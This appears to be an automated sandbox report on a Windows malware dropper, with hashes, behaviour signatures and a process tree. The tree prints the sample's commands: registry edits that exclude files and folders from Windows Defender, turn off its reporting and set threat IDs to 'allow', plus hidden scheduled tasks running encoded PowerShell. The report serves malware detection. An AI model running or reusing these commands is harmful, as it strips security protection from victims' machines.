Analysis

  • max time kernel
    142s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/11/2023, 12:03

General

  • Target

    fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83.exe

  • Size

    7.2MB

  • MD5

    9d1ddd1ca0d9498825fbf01d391c1ccc

  • SHA1

    cdcbe91eaa92af3329e770bebc10f202b7878d67

  • SHA256

    fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83

  • SHA512

    997e9ef7f9c4a8860cae5b88a837bea7bead14c2661d7102f47f68ece87a87494bb4fb2cd22724c95a8462d45215570972cbf5aa24bff74f4f4a6e2888772543

  • SSDEEP

    98304:91OTAGL8ifPhkW0O41Z9hLMmXvheDiH2l/fcvHx9JuCshBgNw/zxmhPupr0WnloD:91OTrkNvLhQi0DweER9REqWn2PzOB8CA

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 29 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83.exe
    "C:\Users\Admin\AppData\Local\Temp\fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5028
    • C:\Users\Admin\AppData\Local\Temp\7zSF2FB.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4460
      • C:\Users\Admin\AppData\Local\Temp\7zSF6F3.tmp\Install.exe
        .\Install.exe /MdidgRE "385118" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4616
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4200
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3848
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3816
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1880
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4044
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1140
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1092
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gaUPBPrML" /SC once /ST 07:00:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:804
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gaUPBPrML"
                  4⤵
                    PID:4488
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gaUPBPrML"
                    4⤵
                      PID:180
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bqEFPgBHoYySYAkccD" /SC once /ST 12:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\wEdTimZ.exe\" ov /Gosite_idwLk 385118 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:3504
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1596
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:4124
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:1612
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:4436
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:456
                      • C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\wEdTimZ.exe
                        C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\wEdTimZ.exe ov /Gosite_idwLk 385118 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:4300
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3036
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1336
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:4764
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:1420
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:3440
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:748
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:1596
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:2576
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:456
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:3700
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:3296
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:3448
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:4756
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4780
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:3988
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:1300
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:2308
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:1956
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:3592
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:4028
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:4204
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:2076
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:1932
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:4748
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:2936
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:4920
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                              PID:3500
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:1264
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:2212
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:1936
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjJZYiuqlPgU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjJZYiuqlPgU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DIGofpDPDqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DIGofpDPDqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kpvgWGyvU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kpvgWGyvU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wStPwHPBGQsuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wStPwHPBGQsuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hXJwqLKSgMLJYCVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hXJwqLKSgMLJYCVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UQvARBrwpbLJoyHM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UQvARBrwpbLJoyHM\" /t REG_DWORD /d 0 /reg:64;"
                                                                                  2⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4192
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:32
                                                                                    3⤵
                                                                                      PID:4744
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                          PID:932
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:4116
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DIGofpDPDqUn" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:4740
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DIGofpDPDqUn" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:2208
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:880
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:1912
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kpvgWGyvU" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:1076
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kpvgWGyvU" /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4436
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wStPwHPBGQsuC" /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4956
